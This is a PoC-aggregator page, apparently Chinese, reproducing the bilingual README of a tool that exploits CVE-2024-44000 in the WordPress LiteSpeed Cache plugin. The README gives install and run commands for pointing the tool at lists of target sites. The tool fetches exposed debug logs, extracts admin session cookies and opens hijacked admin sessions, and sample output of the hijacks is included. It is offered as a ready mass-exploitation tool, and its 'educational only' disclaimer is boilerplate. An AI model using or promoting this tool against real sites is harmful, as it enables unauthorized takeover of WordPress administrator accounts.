POC详情: ad66c129f8cbad865ff25c83963ade48150b7980

来源
关联漏洞
标题: WordPress plugin LiteSpeed Cache 安全漏洞 (CVE-2024-44000)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin LiteSpeed Cache 6.5.0.1版本之前存在安全漏洞,该漏洞源于包含一个凭证保护不足漏洞。
描述
is a PoC tool designed to exploit insecurely exposed debug logs from WordPress sites and extract session cookies
介绍

# EN
**GenCookieSessionHijack** is a PoC tool designed to exploit insecurely exposed debug logs from WordPress sites and extract session cookies. This allows the attacker to hijack active admin sessions and gain unauthorized access to the WordPress admin dashboard.

## Features
- Extract cookies from WordPress debug logs.
- Identify and filter session cookies (e.g., `wordpress_logged_in`).
- Automatically attempt session hijacking for admin access.
- Open the hijacked admin session directly in the browser.

## Usage
### Installation

```bash
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
```

### Running the tool

1. Prepare a list of target WordPress URLs in a file, one per line (e.g., `list.txt`).
2. Run the tool using the following command:

```bash
python GenCookieSessionHijack.py -f list.txt -o result.txt
```

### Parameters

- `-f, --file`: Path to the file containing the list of URLs (default: `list.txt`).
- `-o, --output`: File to save the results (default: `result.txt`).

## Example

```bash
python GenCookieSessionHijack.py -f targets.txt -o output.txt
```

This will read the list of URLs from `targets.txt`, attempt to extract and use session cookies, and save the results to `output.txt`.


## Output

If the session hijacking attempt is successful, the tool will generate a URL with the hijacked admin session cookie and open it directly in the default browser.

### Example output:

```
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

```

## Legal Disclaimer

This tool is intended for educational purposes only and should not be used for illegal activities. The author is not responsible for any misuse or damage caused by this tool.


# RU

**GenCookieSessionHijack** — это PoC скрипт, созданный для эксплуатации уязвимо раскрытых отладочных логов на сайтах WordPress с целью извлечения сессионных cookies. Это позволяет злоумышленнику перехватить активные сеансы администратора и получить несанкционированный доступ к панели администрирования WordPress.


## Особенности
- Извлечение cookies из отладочных логов WordPress.
- Идентификация и фильтрация сессионных cookies (например, `wordpress_logged_in`).
- Автоматическая попытка захвата сеанса для доступа в админку.
- Открытие захваченного сеанса администратора непосредственно в браузере.


## Использование
### Установка

```bash
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
```

### Запуск программы

1. Подготовьте файл со списком целевых URL WordPress, по одному на строку (например, `list.txt`).
2. Запустите программу следующей командой:

```bash
python GenCookieSessionHijack.py -f list.txt -o result.txt
```

### Параметры

- `-f, --file`: Путь к файлу со списком URL (по умолчанию: `list.txt`).
- `-o, --output`: Файл для сохранения результатов (по умолчанию: `result.txt`).

## Пример

```bash
python GenCookieSessionHijack.py -f targets.txt -o output.txt
```

Это прочитает список URL из `targets.txt`, попытается извлечь и использовать сессионные cookies, и сохранит результаты в `output.txt`.

## Результаты

Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.

### Пример вывода:

```
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

```


## Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.
文件快照

[4.0K] /data/pocs/ad66c129f8cbad865ff25c83963ade48150b7980 ├── [6.1K] GenCookieSessionHijack.py ├── [1.0K] LICENSE ├── [6.2K] README.md └── [ 26] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。